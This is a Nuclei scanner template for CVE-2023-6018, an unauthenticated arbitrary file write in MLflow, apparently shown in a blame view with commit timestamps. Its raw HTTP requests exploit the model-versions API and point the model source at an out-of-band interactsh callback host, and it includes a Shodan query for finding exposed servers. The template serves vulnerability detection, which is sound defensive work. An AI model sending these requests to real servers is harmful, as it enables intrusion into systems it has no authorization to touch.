2023-12-05 16:13:27 +00:00
|
|
|
id: CVE-2023-6018
|
2023-12-05 09:43:06 +00:00
|
|
|
|
|
|
|
info:
|
2023-12-05 16:13:27 +00:00
|
|
|
name: Mlflow Arbitrary File Write via model-versions API
|
|
|
|
author: byt3bl33d3r
|
2023-12-05 09:43:06 +00:00
|
|
|
severity: critical
|
2023-12-05 16:13:27 +00:00
|
|
|
description: |
|
|
|
|
An attacker can overwrite any file on the server hosting MLflow without any authentication.
|
2023-12-05 09:43:06 +00:00
|
|
|
reference:
|
|
|
|
- https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
|
2023-12-05 16:13:27 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6018
|
2023-12-05 09:43:06 +00:00
|
|
|
classification:
|
2023-12-05 16:13:27 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2023-12-05 09:43:06 +00:00
|
|
|
cve-id: CVE-2023-6018
|
2023-12-05 16:13:27 +00:00
|
|
|
cwe-id: CWE-78
|
|
|
|
epss-score: 0.00102
|
|
|
|
epss-percentile: 0.41283
|
|
|
|
cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
shodan-query: http.title:"mlflow"
|
|
|
|
tags: cve,cve2023,mlflow,huntr,oss,rce
|
2023-12-05 09:43:06 +00:00
|
|
|
|
|
|
|
variables:
|
|
|
|
model_name: "{{rand_text_alpha(6)}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"name": "{{model_name}}"}
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2023-12-05 16:13:27 +00:00
|
|
|
matchers-condition: and
|
2023-12-05 09:43:06 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-12-05 16:13:27 +00:00
|
|
|
part: body_1
|
|
|
|
words:
|
|
|
|
- '"registered_model":'
|
|
|
|
- '"name":'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
2023-12-05 09:43:06 +00:00
|
|
|
words:
|
|
|
|
- "http"
|